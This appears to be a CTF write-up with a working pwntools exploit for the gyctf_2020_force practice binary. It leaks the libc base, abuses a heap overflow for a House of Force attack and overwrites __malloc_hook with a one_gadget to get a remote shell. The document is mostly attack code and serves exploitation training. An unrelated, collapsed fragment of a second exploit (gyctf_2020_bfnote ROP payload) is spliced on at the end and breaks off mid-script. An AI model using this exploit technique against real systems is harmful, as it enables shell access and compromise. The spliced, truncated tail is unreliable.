64 位 libc 2.23，house of force。这里不管申请多大的堆，都会读入 0x50 大小，所以这里存在一个堆溢出，可以借此修改 top chunk 的大小。这里有一个很重要的关于泄露 libc 的知识：申请一个极大的 chunk，程序就会调用 mmap 进行内存分配，分配到的地址与 libc 的地址相邻。所以这里我们可以先申请一个 0x100000 的 chunk 来泄露 libc 的基址，随后修改 top chunk，利用 house of force 进行攻击，修改 malloc hook 来 getshell。
"""Exploit script for the BUUOJ practice binary gyctf_2020_force (x86-64, glibc 2.23).

Technique (see the write-up text above this script): every "add" reads 0x50 bytes
regardless of the requested size, so the content of a small chunk overflows into
the top chunk header. The script (1) leaks the libc base from a huge, mmap-served
allocation, (2) overwrites the top chunk size through the overflow, (3) uses
House of Force to move the top chunk next to __malloc_hook, and (4) writes hook
values so that the next allocation hands control to them.

NOTE(review): this only applies to old glibc. glibc 2.29+ aborts when the top
chunk size exceeds the arena's system_mem ("malloc(): corrupted top size"), and
__malloc_hook/__realloc_hook stopped being usable hooks in glibc 2.34.
"""
from pwn import *

context.log_level='debug'
context.arch = 'amd64'
#p=process('./gyctf_2020_force')
p=remote('node3.buuoj.cn',25871)
elf=ELF('./gyctf_2020_force')
libc=ELF('./libc-2.23_64.so')


def add(size,data):
    """Drive menu option 1 ("add") once and return the chunk address it prints.

    Args:
        size: value sent as the allocation size (converted with str()).
        data: content sent to the chunk with send(), i.e. raw, no trailing newline.

    Returns:
        int: the address parsed (base 16) from the 14 characters printed after
        "bin addr " -- presumably "0x" plus 12 hex digits.
    """
    p.recvuntil('2:puts')
    p.sendline('1')
    p.recvuntil('size')
    p.sendline(str(size))
    p.recvuntil('bin addr ')
    heap_addr=int(p.recv(14),16)
    p.recvuntil('content')
    p.send(data)
    return heap_addr


'''
#this can be use in local not remote
libc_heap=add(0x100000,'aa')
libc_base=libc_heap-0x4d2010
'''
# Leak: a request this large is served by mmap rather than the brk heap, and the
# mapping ends up at a fixed distance from libc, so one printed address yields the
# libc base. The 0x200ff0 delta is specific to this target's libc/mapping layout.
#this can use both remote and local
libc_heap=add(0x200000,'aaaa')
libc_base=libc_heap+0x200ff0
print(hex(libc_base))
#gdb.attach(p)
#pause()
#0x4d2010=0x7f8cda933010-(0x7f8cda825b10-0x3c4b10)
# libc-2.23 (64-bit) symbol offsets, all rebased on libc_base.
malloc_hook=libc_base+0x3c4b10
realloc_hook=malloc_hook-0x8  # __realloc_hook sits 8 bytes below __malloc_hook
realloc=libc_base+0x846c0
one_gadget=libc_base+0x4526a
bin_sh=libc_base+0x18cd57
system=libc_base+0X45390
#onegadget is no use here because none of them is empty
#gdb.attach(p)
#pause()
# Overflow: the program reads 0x50 bytes into a 0x20-byte request, so the sixth
# qword (0xffffffffffffffff) presumably lands on the top chunk's size field and
# makes the top chunk look unbounded -- the House of Force precondition.
payload=p64(0)*5+p64(0xffffffffffffffff)
heap_base=add(0x20,payload)-0x10#0x030
print(hex(heap_base))
# Variant A: one_gadget via __realloc_hook (the author reports it works locally
# and remotely).
# House of Force step: request exactly the distance to __malloc_hook so the top
# chunk moves there. The author notes the extra -0x10 is an alignment
# requirement: with -0x8 the write fails and nothing lands in the hook.
size=malloc_hook-heap_base-0x50-0x10
add(size,'aa')
# Next chunk's user data presumably starts at malloc_hook-0x10: 8 filler bytes,
# then one_gadget into __realloc_hook, then realloc+16 into __malloc_hook.
add(0x20,'a'*8+p64(one_gadget)+p64(realloc+16))
#gdb.attach(p)
#pause()
# Trigger: any further allocation now goes through the overwritten hook.
p.recvuntil('2:puts')
p.sendline('1')
p.recvuntil('size')
p.sendline('12')
p.interactive()
# Variant B (kept disabled by the author): __malloc_hook -> system, with the
# "/bin/sh" address passed as the decimal request size.
'''
#use malloc hook->system this can success in local and remote# 使用system
size=malloc_hook-heap_base-0x50
add(size,'aa')
add(0x20,p64(system))
p.recvuntil('2:puts')
p.sendline('1')
p.recvuntil('size')
p.sendline(str(bin_sh)) #here is str not p64
p.interactive()
'''
# -*- coding: utf-8 -*- from pwn import * context.log_level='debug' context.arch = 'i386' #p=process('./gyctf_2020_bfnote') p=remote('node3.buuoj.cn',28253) elf=ELF('./gyctf_2020_bfnote') read_got=elf.got['read'] read_plt=elf.plt['read'] fprintf_plt=elf.plt['fprintf'] fprintf_got=elf.got['fprintf'] atol_got=elf.got['atol'] libc_start=elf.plt['__libc_start_main'] leave_ret=0x08048578 stdout=0x804A044 postscript=0x804a060 main=0x8048761 _s=0x8048B5a #_IO_printf 00049670 #_IO_fprintf 00049650 #read 5b00 #write 5b70 print(hex(read_got)) print(hex(fprintf_got)) print(hex(fprintf_plt)) pop_4=0x080489d8 #0x080489d8 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret pop_3=0x080489d9 #0x080489d9 : pop esi ; pop edi ; pop ebp ; ret pop_2=0x080489da #0x080489da : pop edi ; pop ebp ; ret p.recvuntil('Give your description : ') payload='a'*0x32+'bbbb'+p32(0)+p32(postscript+0x400+4) p.sendline(payload) p.recvuntil('Give your postscript : ') pop_ebx=0x08048441